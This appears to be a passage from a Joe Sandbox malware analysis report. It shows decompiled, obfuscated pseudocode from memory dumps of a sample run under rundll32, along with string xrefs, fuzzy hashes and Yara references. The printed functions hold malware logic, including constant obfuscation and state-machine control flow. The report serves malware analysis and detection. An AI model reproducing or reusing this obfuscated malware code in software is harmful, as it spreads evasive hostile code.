				_v32 = 0x3bcc;
				_v32 = _v32 >> 3;
				_v32 = _v32 << 0xa;
				_v32 = _v32 ^ 0x001da571;
				_v20 = 0xf201;
				_t118 = 0x6a;
				_v20 = _v20 / _t118;
				_v20 = _v20 | 0xe2b46b61;
				_t119 = 0x7b;
				_t133 = _a4;
				_v20 = _v20 / _t119;
				_v20 = _v20 ^ 0x01d7ce84;
				_v36 = 0x5b49;
				_v36 = _v36 * 0x73;
				_v36 = _v36 ^ 0x48cc9d1b;
				_v36 = _v36 ^ 0x48e5c7c4;
				_v16 = 0xd187;
				_v16 = _v16 << 5;
				_v16 = _v16 | 0x08003ce7;
				_v16 = _v16 + 0xe504;
				_v16 = _v16 ^ 0x081b14b1;
				_v12 = 0x85bb;
				_v12 = _v12 + 0xcd9e;
				_v12 = _v12 | 0x9f7708de;
				_v12 = _v12 ^ 0x14303fed;
				_v12 = _v12 ^ 0x8b4777c9;
				_t108 =  *((intOrPtr*)(_t133 + 0x1c))( *_t133, 1, 0);
				_t137 = _t108;
				if(_t108 != 0) {
					E00204E4B( &_v116, _v28, _v8, _v24);
					_v52 =  &_v116;
					_v48 = E001F93FA(_v40, _v32, _t137,  &_v44);
					 *((intOrPtr*)(_t133 + 0x1c))( *_t133, 0xa,  &_v52);
					E0020C5F7(_v20, _v36, _v16, _v12, _v48);
				}
				return 0;
			}

0x001f881c
0x001f8825
0x001f882c
0x001f8833
0x001f883a
0x001f8847
0x001f884c
0x001f8851
0x001f8855
0x001f885c
0x001f8863
0x001f886a
0x001f8871
0x001f8875
0x001f887c
0x001f8883
0x001f8887
0x001f888e
0x001f8895
0x001f8899
0x001f889d
0x001f88a4
0x001f88ae
0x001f88b3
0x001f88b8
0x001f88c2
0x001f88c5
0x001f88c8
0x001f88cb
0x001f88d2
0x001f88e1
0x001f88e4
0x001f88eb
0x001f88f2
0x001f88f9
0x001f88fd
0x001f8904
0x001f890b
0x001f8912
0x001f8919
0x001f8920
0x001f8927
0x001f892e
0x001f8937
0x001f893a
0x001f893c
0x001f894a
0x001f895b
0x001f8969
0x001f8974
0x001f8986
0x001f898b
0x001f8994

Strings

<, xrefs: 001F88FD
I[, xrefs: 001F88D2
M56q, xrefs: 001F8833

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: I[$M56q$<
API String ID: 0-676366452
Opcode ID: 533792c641697c23b1969ba288ab2592c90c38387ee53b4d6db73c4c28b3a90b
Instruction ID: b2ee376b9bd972bc91d019298b9aac0c04338309d9547ff017894c64bed5f493
Opcode Fuzzy Hash: 533792c641697c23b1969ba288ab2592c90c38387ee53b4d6db73c4c28b3a90b
Instruction Fuzzy Hash: 2441EF71D0020DEBEF08CFA0C94A9EEBBB1FF08308F208159D511B6290D7B95A19DF95

Uniqueness

Uniqueness Score: -1.00%

Function 00297D8A, Relevance: 3.8, Strings: 3, Instructions: 99COMMON

Download Yara Rule

Strings

I[, xrefs: 00297E46
M56q, xrefs: 00297DA7
<, xrefs: 00297E71

Memory Dump Source

Source File: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: I[$M56q$<
API String ID: 0-676366452
Opcode ID: 6c153694e405c2237b24d8d19c5f405e1212448756b9ba5c42362a4f521f7919
Instruction ID: 6ea2713d4470437d9b47e8d0e117c67c87a0e83b196988fe3d269e631db10f01
Opcode Fuzzy Hash: 6c153694e405c2237b24d8d19c5f405e1212448756b9ba5c42362a4f521f7919
Instruction Fuzzy Hash: 4A41FF31D00209EBEF09CFA0C94A9EEBBB1FB04304F208159D511B6290D7B95A19DF94

Uniqueness

Uniqueness Score: -1.00%

Function 001F4A2B, Relevance: 3.8, Strings: 3, Instructions: 96
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E001F4A2B(void* __ecx) {
				void* _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				unsigned int _v40;
				signed int _v44;
				signed int _v48;
				void* _t87;
				void* _t92;
				void* _t94;
				void* _t96;
				signed int _t102;
				void* _t104;
				signed int* _t106;

				_t106 =  &_v48;
				_v16 = 0x385f10;
				asm("stosd");
				_t94 = __ecx;
				_t104 = 0;
				_t96 = 0x34518db6;
				asm("stosd");
				asm("stosd");
				_v36 = 0xcbb3;
				_v36 = _v36 | 0xf42c2371;
				_v36 = _v36 ^ 0x43021788;
				_v36 = _v36 + 0x4a8d;
				_v36 = _v36 ^ 0xb72f589f;
				_v40 = 0x92a4;
				_t102 = 0x4a;
				_v40 = _v40 * 0x57;
				_v40 = _v40 << 3;
				_v40 = _v40 >> 7;
				_v40 = _v40 ^ 0x00036b7d;
				_v44 = 0xfc25;
				_v44 = _v44 >> 4;
				_v44 = _v44 << 2;
				_v44 = _v44 | 0xbf219be2;
				_v44 = _v44 ^ 0xbf219961;
				_v48 = 0xa043;
				_v48 = _v48 + 0xffff5a3d;
				_v48 = _v48 / _t102;
				_v48 = _v48 | 0x078bf529;
				_v48 = _v48 ^ 0x07ff8e41;
				_v20 = 0x3370;
				_v20 = _v20 >> 0xe;
				_v20 = _v20 ^ 0x00001c98;
				_v24 = 0x4528;
				_v24 = _v24 | 0xa2a77225;
				_v24 = _v24 ^ 0x1237b29c;
				_v24 = _v24 ^ 0xb090e9f5;
				_v28 = 0xec9c;
				_v28 = _v28 | 0x23d683f6;
				_v28 = _v28 >> 0xf;
				_v28 = _v28 + 0xffff32f8;
				_v28 = _v28 ^ 0xffff48c1;
				_v32 = 0x5f5a;
				_v32 = _v32 ^ 0xd2da3bda;
				_v32 = _v32 + 0xe7f3;
				_v32 = _v32 + 0xffff294c;
				_v32 = _v32 ^ 0xd2da16fe;
				do {
					while(_t96 != 0x1bdf2e1f) {
						if(_t96 == 0x309c6e61) {
							_t92 = E001F7E30();
							_t106 = _t106 - 0xc + 0xc;
							_t96 = 0x1bdf2e1f;
							_t104 = _t104 + _t92;
							continue;
						} else {
							if(_t96 == 0x34518db6) {
								_t96 = 0x309c6e61;
								continue;
							}
						}
						goto L7;
					}
					_t87 = E001F7544(_v20, _v24, _v28, _t94 + 4, _v32);
					_t106 =  &(_t106[3]);
					_t96 = 0x25e8f6f4;
					_t104 = _t104 + _t87;
					L7:
				} while (_t96 != 0x25e8f6f4);
				return _t104;
			}

0x001f4a2b
0x001f4a2e
0x001f4a42
0x001f4a43
0x001f4a47
0x001f4a49
0x001f4a53
0x001f4a54
0x001f4a55
0x001f4a5d
0x001f4a65
0x001f4a6d
0x001f4a75
0x001f4a7d
0x001f4a8a
0x001f4a8b
0x001f4a8f
0x001f4a94
0x001f4a99
0x001f4aa1
0x001f4aa9
0x001f4aae
0x001f4ab3
0x001f4abb
0x001f4ac3
0x001f4acb
0x001f4ade
0x001f4ae2
0x001f4aea
0x001f4af2
0x001f4afa
0x001f4aff
0x001f4b07
0x001f4b0f
0x001f4b17
0x001f4b1f
0x001f4b27
0x001f4b2f
0x001f4b37
0x001f4b3c
0x001f4b44
0x001f4b4c
0x001f4b54
0x001f4b5c
0x001f4b64
0x001f4b6c
0x001f4b74
0x001f4b74
0x001f4b7e
0x001f4b9f
0x001f4ba4
0x001f4ba7
0x001f4bac
0x00000000
0x001f4b80
0x001f4b86
0x001f4b88
0x00000000
0x001f4b88
0x001f4b86
0x00000000
0x001f4b7e
0x001f4bc4
0x001f4bc9
0x001f4bcc
0x001f4bce
0x001f4bd0
0x001f4bd0
0x001f4bdd

Strings

(E, xrefs: 001F4B07
p3, xrefs: 001F4AF2
Z_, xrefs: 001F4B4C

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: (E$Z_$p3
API String ID: 0-2346288438
Opcode ID: f19db067588b1c729666bf50a3d5b19d99c1b8200e5bf7cb63d90fb317ce5846
Instruction ID: 5d424b3307cf767ac971caa0498b364f0602e922950b88679377a3118f55abc4
Opcode Fuzzy Hash: f19db067588b1c729666bf50a3d5b19d99c1b8200e5bf7cb63d90fb317ce5846
Instruction Fuzzy Hash: D94147715083459BD358CF24C54A42BFBE1BBD8758F140E1DF599A6260D3B8CA098B8B

Uniqueness

Uniqueness Score: -1.00%

Function 00293F9F, Relevance: 3.8, Strings: 3, Instructions: 96COMMON

Download Yara Rule

Strings

p3, xrefs: 00294066
(E, xrefs: 0029407B
Z_, xrefs: 002940C0

Memory Dump Source

Source File: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: (E$Z_$p3
API String ID: 0-2346288438
Opcode ID: f19db067588b1c729666bf50a3d5b19d99c1b8200e5bf7cb63d90fb317ce5846
Instruction ID: 5b9193406a74b4d5a10766e2927efc06adfb2f0dfa7898c5c09105475841ce00
Opcode Fuzzy Hash: f19db067588b1c729666bf50a3d5b19d99c1b8200e5bf7cb63d90fb317ce5846
Instruction Fuzzy Hash: 9E4165715083419BD758DE24C58A41FFBE1BFD8758F140E1DF59AA6220D3B8CA198F8B

Uniqueness

Uniqueness Score: -1.00%

Function 00231E14, Relevance: 2.9, Strings: 2, Instructions: 405COMMON

Download Yara Rule

Strings

k%, xrefs: 00232018, 0023202F, 0023203A, 00232107, 00232229
d.#, xrefs: 002320C1, 002321E9

Memory Dump Source

Source File: 00000007.00000002.2091670626.0000000000214000.00000020.00020000.sdmp, Offset: 00214000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_214000_rundll32.jbxd

Similarity

API ID:
String ID: k%$d.#
API String ID: 0-4029520580
Opcode ID: df3261f2e5f884ade511f2c1a25500ae29d8036d85fd85c922d9ba7cc60b52d5
Instruction ID: a1dba667a725569b2b37badb3f561859973a79bbdf5f01947f3e5739a4d38ac7
Opcode Fuzzy Hash: df3261f2e5f884ade511f2c1a25500ae29d8036d85fd85c922d9ba7cc60b52d5
Instruction Fuzzy Hash: 02E135B4A2020ADFCB10EFA8C88199EF3F5FB58300F2485A5E945A7662D734ED65CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00204E4B, Relevance: 2.7, Strings: 2, Instructions: 164
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00204E4B(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				unsigned int _v72;
				signed int _v76;
				void* _t128;
				void* _t138;
				signed int _t141;
				intOrPtr _t143;
				signed int _t144;
				void* _t147;
				intOrPtr* _t148;
				void* _t162;
				signed int _t163;

				_push(_a12);
				_t162 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(0x40);
				_push(__ecx);
				E001F56B2(_t128);
				_v20 = 0x10;
				_v32 = 0xa61f;
				_v32 = _v32 + 0xa8ad;
				_t144 = 0;
				_v32 = _v32 ^ 0x00012e5d;
				_t147 = 0x2817a0c8;
				_v36 = 0xad73;
				_t163 = 0x7d;
				_v36 = _v36 * 0x18;
				_v36 = _v36 ^ 0x00106704;
				_v28 = 0xa63d;
				_v28 = _v28 >> 3;
				_v28 = _v28 ^ 0x00001262;
				_v76 = 0xc830;
				_v76 = _v76 + 0xffffcf51;
				_v76 = _v76 ^ 0x61a5e6c8;
				_v76 = _v76 + 0xffffd3c1;
				_v76 = _v76 ^ 0x61a52b9a;
				_v60 = 0xaf2b;
				_v60 = _v60 + 0xffff794e;
				_v60 = _v60 << 9;
				_v60 = _v60 ^ 0x0050bd44;
				_v72 = 0xd683;
				_v72 = _v72 * 0x4e;
				_v72 = _v72 >> 7;
				_v72 = _v72 + 0x8cf4;
				_v72 = _v72 ^ 0x00017a15;
				_v48 = 0x2f64;
				_v48 = _v48 + 0x8745;
				_v48 = _v48 >> 9;
				_v48 = _v48 ^ 0x00003344;
				_v52 = 0xde80;
				_v52 = _v52 >> 8;
				_v52 = _v52 + 0xe2ec;
				_v52 = _v52 ^ 0x0000cf48;
				_v24 = 0x26fb;
				_v24 = _v24 ^ 0x99bfc1a1;
				_v24 = _v24 ^ 0x99bffb6f;
				_v56 = 0x40f3;
				_v56 = _v56 << 5;
				_v56 = _v56 ^ 0x9a684b3f;
				_v56 = _v56 ^ 0x9a60118c;
				_v64 = 0xe209;
				_v64 = _v64 / _t163;
				_v64 = _v64 << 2;
				_v64 = _v64 ^ 0xdf73d75b;
				_v64 = _v64 ^ 0xdf73ad9f;
				_v40 = 0xf4ff;
				_v40 = _v40 << 1;
				_v40 = _v40 * 0x32;
				_v40 = _v40 ^ 0x005fe217;
				_v68 = 0xde81;
				_v68 = _v68 + 0xc2e0;
				_v68 = _v68 << 0xc;
				_v68 = _v68 >> 0xc;
				_v68 = _v68 ^ 0x0001df05;
				_v44 = 0x9d75;
				_v44 = _v44 ^ 0xc94ec8c4;
				_v44 = _v44 ^ 0xe16feb53;
				_v44 = _v44 ^ 0x2821dabf;
				do {
					while(_t147 != 0x479232b) {
						if(_t147 == 0x1eeae304) {
							__eflags = E0020C901(_v32,  &_v16,  &_v20, _v36);
							if(__eflags != 0) {
								_t147 = 0x479232b;
								continue;
							}
						} else {
							if(_t147 == 0x264c2085) {
								_push(_v60);
								_push(_v76);
								_t138 = E00202164(0x1f1270, _v28, __eflags);
								_t141 = E001FDBE9(_v48, __eflags, _v52, _v24, _t162, E001F8CA3(__eflags), 0x40,  &_v16, _v56);
								__eflags = _t141;
								_t126 = _t141 > 0;
								__eflags = _t126;
								_t144 = 0 | _t126;
								E0020C5F7(_v64, _v40, _v68, _v44, _t138);
							} else {
								if(_t147 != 0x2817a0c8) {
									goto L18;
								} else {
									_t147 = 0x1eeae304;
									continue;
								}
							}
						}
						L21:
						return _t144;
					}
					_t148 =  &_v16;
					__eflags = _v16 - _t144;
					if(_v16 != _t144) {
						do {
							_t143 =  *_t148;
							__eflags = _t143 - 0x30;
							if(_t143 < 0x30) {
								L11:
								__eflags = _t143 - 0x61;
								if(_t143 < 0x61) {
									L13:
									__eflags = _t143 - 0x41;
									if(_t143 < 0x41) {
										L15:
										 *_t148 = 0x58;
									} else {
										__eflags = _t143 - 0x5a;
										if(_t143 > 0x5a) {
											goto L15;
										}
									}
								} else {
									__eflags = _t143 - 0x7a;
									if(_t143 > 0x7a) {
										goto L13;
									}
								}
							} else {
								__eflags = _t143 - 0x39;
								if(_t143 > 0x39) {
									goto L11;
								}
							}
							_t148 = _t148 + 1;
							__eflags =  *_t148 - _t144;
						} while ( *_t148 != _t144);
					}
					_t147 = 0x264c2085;
					L18:
					__eflags = _t147 - 0xaeeb649;
				} while (__eflags != 0);
				goto L21;
			}

0x00204e52
0x00204e56
0x00204e58
0x00204e5c
0x00204e60
0x00204e62
0x00204e63
0x00204e68
0x00204e73
0x00204e7d
0x00204e85
0x00204e87
0x00204e8f
0x00204e94
0x00204ea8
0x00204ea9
0x00204ead
0x00204eb5
0x00204ebd
0x00204ec2
0x00204eca
0x00204ed2
0x00204eda
0x00204ee2
0x00204eea
0x00204ef2
0x00204efa
0x00204f02
0x00204f07
0x00204f0f
0x00204f1c
0x00204f20
0x00204f25
0x00204f2d
0x00204f35
0x00204f3d
0x00204f45
0x00204f4a
0x00204f52
0x00204f5a
0x00204f5f
0x00204f67
0x00204f6f
0x00204f77
0x00204f7f
0x00204f87
0x00204f8f
0x00204f94
0x00204f9c
0x00204fa4
0x00204fb7
0x00204fbb
0x00204fc0
0x00204fc8
0x00204fd0
0x00204fd8
0x00204fe1
0x00204fe5
0x00204fed
0x00204ff5
0x00204ffd
0x00205002
0x00205007
0x0020500f
0x00205017
0x0020501f
0x00205027
0x0020502f
0x0020502f
0x00205035
0x00205063
0x00205065
0x0020506b
0x00000000
0x0020506b
0x00205037
0x0020503d
0x002050aa
0x002050b3
0x002050bb
0x002050e6
0x002050f2
0x002050fc
0x002050fc
0x002050fc
0x00205103
0x0020503f
0x00205045
0x00000000
0x00205047
0x00205047
0x00000000
0x00205047
0x00205045
0x0020503d
0x0020510e
0x00205114
0x00205114
0x0020506f
0x00205073
0x00205077
0x00205079
0x00205079
0x0020507b
0x0020507d
0x00205083
0x00205083
0x00205085
0x0020508b
0x0020508b
0x0020508d
0x00205093
0x00205093
0x0020508f
0x0020508f
0x00205091
0x00000000
0x00000000
0x00205091
0x00205087
0x00205087
0x00205089
0x00000000
0x00000000
0x00205089
0x0020507f
0x0020507f
0x00205081
0x00000000
0x00000000
0x00205081
0x00205096
0x00205097
0x00205097
0x00205079
0x0020509b
0x002050a0
0x002050a0
0x002050a0
0x00000000

Strings

So, xrefs: 0020501F
D3, xrefs: 00204F4A

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: D3$So
API String ID: 0-1798533957
Opcode ID: 91331163aab7ae60d2c6f1b397bfc358730b6ebc9008c6a04dcc6ea465eabc1c
Instruction ID: 7bbb82b3dcc540b71f96c63c957a5c30ac7d515a4265a7e99e99b0f9eb44b12e
Opcode Fuzzy Hash: 91331163aab7ae60d2c6f1b397bfc358730b6ebc9008c6a04dcc6ea465eabc1c
Instruction Fuzzy Hash: 587185710093429FD758CF20C48951FFBE2BBC5758F50491CF186962A2C3B58A5ACF87

Uniqueness

Uniqueness Score: -1.00%

Function 00201B71, Relevance: 2.7, Strings: 2, Instructions: 164
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E00201B71(intOrPtr* __ecx, void* __edx, signed int _a4, intOrPtr _a8) {
				char _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				void* _t130;
				signed int _t156;
				signed int _t158;
				signed int _t159;
				signed int _t160;
				void* _t163;
				intOrPtr* _t180;
				signed int* _t181;
				signed int* _t184;

				_t181 = _a4;
				_push(_a8);
				_t180 = __ecx;
				_push(_t181);
				_push(__ecx);
				E001F56B2(_t130);
				_a4 = 0x4753;
				_t184 =  &(( &_v100)[4]);
				_a4 = _a4 >> 4;
				_t163 = 0x1ce4a29c;
				_t158 = 0x7b;
				_a4 = _a4 / _t158;
				_a4 = _a4 + 0xffff71bd;
				_a4 = _a4 ^ 0xffff4206;
				_v72 = 0xd68c;
				_t159 = 5;
				_v72 = _v72 * 0x66;
				_v72 = _v72 ^ 0x00552ab5;
				_v56 = 0xc5bd;
				_v56 = _v56 * 0x1e;
				_v56 = _v56 ^ 0x00172fa5;
				_v96 = 0x2782;
				_v96 = _v96 << 5;
				_v96 = _v96 >> 2;
				_v96 = _v96 / _t159;
				_v96 = _v96 ^ 0x00004dd3;
				_v60 = 0xbb2b;
				_v60 = _v60 ^ 0x9bc1f403;
				_v60 = _v60 ^ 0x9bc17fed;
				_v64 = 0x890;
				_t160 = 0x79;
				_v64 = _v64 / _t160;
				_v64 = _v64 ^ 0x00001224;
				_v68 = 0xd52d;
				_v68 = _v68 | 0x66ad6dc2;
				_v68 = _v68 ^ 0x66addc3f;
				_v80 = 0x2d15;
				_v80 = _v80 ^ 0xe1b04c0e;
				_v80 = _v80 | 0x8df21731;
				_v80 = _v80 ^ 0xedf2018b;
				_v84 = 0x4d41;
				_v84 = _v84 + 0xffffece7;
				_v84 = _v84 ^ 0xe6ee3790;
				_v84 = _v84 * 0x66;
				_v84 = _v84 ^ 0x02d92ffd;
				_v76 = 0x5bdd;
				_v76 = _v76 * 0x72;
				_v76 = _v76 << 0xf;
				_v76 = _v76 ^ 0x7435051d;
				_v88 = 0x9998;
				_v88 = _v88 * 0xf;
				_v88 = _v88 << 3;
				_v88 = _v88 + 0xffff20a8;
				_v88 = _v88 ^ 0x004709cc;
				_v92 = 0xdec6;
				_v92 = _v92 >> 0xc;
				_v92 = _v92 ^ 0x867abd03;
				_v92 = _v92 * 0x46;
				_v92 = _v92 ^ 0xc58fdc4c;
				_v100 = 0x13e8;
				_v100 = _v100 << 9;
				_v100 = _v100 * 0x42;
				_v100 = _v100 + 0xff79;
				_v100 = _v100 ^ 0x0a449f79;
				do {
					while(_t163 != 0x2937ce5) {
						if(_t163 == 0x183d422a) {
							E00208582(_v84, _t180 + 4, __eflags, _v76,  &_v52, _v88, _v92);
						} else {
							if(_t163 == 0x1ce4a29c) {
								_t163 = 0x35771045;
								 *_t181 =  *_t181 & 0x00000000;
								_t181[1] = _v100;
								continue;
							} else {
								if(_t163 == 0x1ed204aa) {
									E001FCD04(_v64,  *_t180, _v68,  &_v52, _v80);
									_t184 =  &(_t184[3]);
									_t163 = 0x183d422a;
									continue;
								} else {
									if(_t163 == 0x3303492c) {
										_push(_t163);
										_t156 = E002057E8(_t181[1]);
										 *_t181 = _t156;
										__eflags = _t156;
										if(__eflags != 0) {
											_t163 = 0x2937ce5;
											continue;
										}
									} else {
										if(_t163 != 0x35771045) {
											goto L13;
										} else {
											_t181[1] = E001F4A2B(_t180);
											_t163 = 0x3303492c;
											continue;
										}
									}
								}
							}
						}
						L16:
						__eflags =  *_t181;
						_t129 =  *_t181 != 0;
						__eflags = _t129;
						return 0 | _t129;
					}
					E0020F3E9(_v56, _v96, _v60, _t181,  &_v52);
					_t184 =  &(_t184[3]);
					_t163 = 0x1ed204aa;
					L13:
					__eflags = _t163 - 0x1f54ddf;
				} while (__eflags != 0);
				goto L16;
			}

0x00201b77
0x00201b7c
0x00201b80
0x00201b82
0x00201b84
0x00201b85
0x00201b8a
0x00201b95
0x00201b98
0x00201ba3
0x00201baa
0x00201baf
0x00201bb5
0x00201bbd
0x00201bc5
0x00201bd2
0x00201bd5
0x00201bd9
0x00201be1
0x00201bee
0x00201bf2
0x00201bfa
0x00201c02
0x00201c07
0x00201c14
0x00201c18
0x00201c20
0x00201c28
0x00201c30
0x00201c38
0x00201c44
0x00201c47
0x00201c4b
0x00201c53
0x00201c5b
0x00201c63
0x00201c6b
0x00201c73
0x00201c7b
0x00201c83
0x00201c8b
0x00201c93
0x00201c9b
0x00201ca8
0x00201cac
0x00201cb4
0x00201cc1
0x00201cc5
0x00201cca
0x00201cd2
0x00201cdf
0x00201ce3
0x00201ce8
0x00201cf0
0x00201cf8
0x00201d00
0x00201d05
0x00201d12
0x00201d16
0x00201d23
0x00201d30
0x00201d3a
0x00201d3e
0x00201d46
0x00201d4e
0x00201d4e
0x00201d5c
0x00201e2e
0x00201d62
0x00201d68
0x00201ddc
0x00201dde
0x00201de1
0x00000000
0x00201d6a
0x00201d70
0x00201dc6
0x00201dcb
0x00201dce
0x00000000
0x00201d72
0x00201d78
0x00201d9b
0x00201d9f
0x00201da4
0x00201da7
0x00201da9
0x00201daf
0x00000000
0x00201daf
0x00201d7a
0x00201d7c
0x00000000
0x00201d82
0x00201d89
0x00201d8c
0x00000000
0x00201d8c
0x00201d7c
0x00201d78
0x00201d70
0x00201d68
0x00201e36
0x00201e38
0x00201e3d
0x00201e3d
0x00201e44
0x00201e44
0x00201dfb
0x00201e00
0x00201e03
0x00201e08
0x00201e08
0x00201e08
0x00000000

Strings

SG, xrefs: 00201B8A
AM, xrefs: 00201C8B

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: AM$SG
API String ID: 0-2359636636
Opcode ID: 335b760aecf9311ccc4c76b46dd11e98044fb8b6b4e5fe0ea9c494827d2a9ad0
Instruction ID: 2187d9d2f332c32ac5bd80768d259475c074639457bebbaa74a9ac33b7b14ee6
Opcode Fuzzy Hash: 335b760aecf9311ccc4c76b46dd11e98044fb8b6b4e5fe0ea9c494827d2a9ad0
Instruction Fuzzy Hash: 3B7135B15083429FD328CF25C48A42FBBE1FBD8348F504A1EF596862A1D375DA59CF82

Uniqueness

Uniqueness Score: -1.00%

Function 002A10E5, Relevance: 2.7, Strings: 2, Instructions: 164COMMON

Download Yara Rule

Strings

AM, xrefs: 002A11FF
SG, xrefs: 002A10FE

Memory Dump Source

Source File: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: AM$SG
API String ID: 0-2359636636
Opcode ID: bda5502fb660e15ffac7b13cc18b2cbff8f6fddd39f1fde31e8ceebadde54493
Instruction ID: 807fc4e1c3b73292220b3b9db88b577f68ec9d50a6b53a6c712642c467510d06
Opcode Fuzzy Hash: bda5502fb660e15ffac7b13cc18b2cbff8f6fddd39f1fde31e8ceebadde54493
Instruction Fuzzy Hash: 677144B15083429FD728CF24C48A82FBBE1FBC5354F604A1EF59686260D7B5CA598F82

Uniqueness

Uniqueness Score: -1.00%

Function 002A43BF, Relevance: 2.7, Strings: 2, Instructions: 164COMMON

Download Yara Rule

Strings

D3, xrefs: 002A44BE
So, xrefs: 002A4593

Memory Dump Source

Source File: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: D3$So
API String ID: 0-1798533957
Opcode ID: b95edf0e81e76b60c7f7246ae57afc40c537ceaa5353c80c01c4e67225d36f9c
Instruction ID: 1da80a3c052d048f25b905004512baf3a7bbe70f198e2ff810fb948e328073a6
Opcode Fuzzy Hash: b95edf0e81e76b60c7f7246ae57afc40c537ceaa5353c80c01c4e67225d36f9c
Instruction Fuzzy Hash: 6D7185710093429FD758DF20C48991BBBE1BBD2B48F40491DF196962A0CBB5CA6ACF87

Uniqueness

Uniqueness Score: -1.00%

Function 0020C6AD, Relevance: 2.6, Strings: 2, Instructions: 148
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E0020C6AD(intOrPtr* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				char _v328;
				char _t161;
				signed int _t164;
				void* _t167;
				signed int _t169;
				signed int _t170;
				signed int _t171;
				signed int _t172;
				signed int _t173;
				char* _t174;
				intOrPtr* _t193;
				void* _t194;
				void* _t195;
				void* _t196;

				_v40 = 0xfa39;
				_v40 = _v40 + 0xdb01;
				_v40 = _v40 + 0xffffe592;
				_v40 = _v40 ^ 0x0001c62b;
				_v68 = 0xbea4;
				_v68 = _v68 >> 0xd;
				_v68 = _v68 ^ 0x00007ac8;
				_v36 = 0x4356;
				_v36 = _v36 >> 0x10;
				_v36 = _v36 >> 4;
				_v36 = _v36 ^ 0x00002e98;
				_v12 = 0xe2d2;
				_v12 = _v12 >> 6;
				_v12 = _v12 + 0xffff2c83;
				_t193 = __ecx;
				_v12 = _v12 * 0x62;
				_v12 = _v12 ^ 0xffb02725;
				_v16 = 0xb4cd;
				_v16 = _v16 >> 9;
				_v16 = _v16 | 0xafffddff;
				_v16 = _v16 ^ 0xafffea00;
				_v8 = 0x68cb;
				_v8 = _v8 | 0xb32e4b28;
				_v8 = _v8 << 0xf;
				_v8 = _v8 ^ 0x0d8dd4c4;
				_v8 = _v8 ^ 0x38786c55;
				_v48 = 0xfb83;
				_v48 = _v48 | 0x7a1a2a9c;
				_v48 = _v48 ^ 0x7a1ab4a3;
				_v20 = 0x79fd;
				_t169 = 3;
				_v20 = _v20 / _t169;
				_v20 = _v20 + 0x1426;
				_t170 = 0x65;
				_v20 = _v20 / _t170;
				_v20 = _v20 ^ 0x00003bd3;
				_v28 = 0xa065;
				_t171 = 0x78;
				_v28 = _v28 / _t171;
				_v28 = _v28 | 0x67e4385d;
				_v28 = _v28 ^ 0x67e41ce2;
				_v52 = 0xcb25;
				_v52 = _v52 | 0x001bc1db;
				_v52 = _v52 ^ 0x001ba08f;
				_v60 = 0xfe76;
				_v60 = _v60 + 0xffff45c9;
				_v60 = _v60 ^ 0x00003b0c;
				_v32 = 0xb195;
				_v32 = _v32 + 0xffff6114;
				_v32 = _v32 << 6;
